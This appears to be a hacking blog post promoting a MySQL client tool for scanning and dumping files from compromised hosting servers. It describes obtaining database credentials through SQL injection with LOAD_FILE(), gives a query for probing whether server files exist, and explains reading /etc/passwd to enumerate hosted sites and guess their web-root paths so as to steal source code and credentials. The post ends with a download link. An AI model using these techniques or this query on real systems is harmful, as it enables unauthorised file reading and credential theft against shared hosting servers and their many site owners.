MySQL Client - File Scanner and Dumper, Is kick-ass for server stored

Hi all;

I’m back to MySQL hacks with a new kiss-ass tool

MySQL Client - File Scanner is a mysql client to scann files and dump!
To use this tool you need to get the MySQL credentials (user,password,database and host), I used a technic with  Load_file() by SQL injection to get that..
The scanner is very faster about 3~5 paths per secund!
Use a If SQL statement..
SELECT IF(SUBSTRING(LOAD_FILE(’the_path’),1,1)IS NULL,FALSE,TRUE)

After you find, you need also to get the file /etc/passwd, this file have all system users for eg: if is a hosting server it have all paths of the sites in stored!
For eg reading ‘etc/passwd’:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
ledwards:x:4969:100::/home/ledwssards/4UPUF7sC7:/bin/bash –> IS A SITE
belselah:x:4970:100::/home/belsesslah/PAN7SasMGB:/bin/bash –> IS A SITE
lobstabooks2:x:4971:100::/home/lobstaaabooks2/FA0fsP4YZB:/bin/bash –> IS A SITE
etc….

The tool have a feature to parsing it!
You need only to copy and past the ‘etc/passwd’ to textbox, and add a logic path used by Apache (see Add End String on GUI)..
To get that you can see on Browser the error generated..
for eg:  /home/the_site/htdocs/index.php
belselah:x:4970:100::/home/asdev/PAN7SMGB:/bin/bash –> IS A SITE
And the possible path is:
/home/belselah/PAN7SMGB/htdocs/index.php
or
/home/belselah/PAN7SMGB/htdocs/index.asp
or
/home/belselah/PAN7SMGB/htdocs/index.htm
etc..

With this you get many source codes and credentials to direct mysql client!!
And also you can dump files with MySQl Client very faster..

 Download Link